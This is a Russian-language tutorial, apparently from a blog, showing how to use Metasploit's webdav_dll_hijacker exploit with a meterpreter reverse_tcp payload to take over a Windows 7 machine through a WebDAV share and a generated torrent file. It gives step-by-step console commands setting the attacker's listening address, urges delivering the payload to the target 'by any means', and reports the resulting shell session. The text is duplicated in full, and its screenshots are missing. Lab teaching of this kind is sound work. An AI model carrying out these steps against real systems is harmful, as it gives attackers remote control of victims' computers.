С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, я буду использовать десктоп с установленной Windows 7.
Итак, запустив Metasploit, вводим следующее:
> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)
> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)
> set lhost 192.168.0.104 (Определим адрес атакующего хоста)
> set extensions torrent (Выберем тип расширения файла)
> exploit (Запустим работу фреймворка)
Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.
Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка:
В консоли атакующего хоста видим сигнализационные сообщения:
Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл:
После его запуска, откроется активная сессия meterpreter:
Проверка -
В опциях эксплойта, можно изменить директорию и название полезной нагрузки:
При попытке применить эксплоит к Windows 8.1:
Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows.
Итак, запустив Metasploit, вводим следующее:
> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)
> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)
> set lhost 192.168.0.104 (Определим адрес атакующего хоста)
> set extensions torrent (Выберем тип расширения файла)
> exploit (Запустим работу фреймворка)
Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.
Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка:
В консоли атакующего хоста видим сигнализационные сообщения:
Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл:
После его запуска, откроется активная сессия meterpreter:
Проверка -
В опциях эксплойта, можно изменить директорию и название полезной нагрузки:
При попытке применить эксплоит к Windows 8.1:
Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows.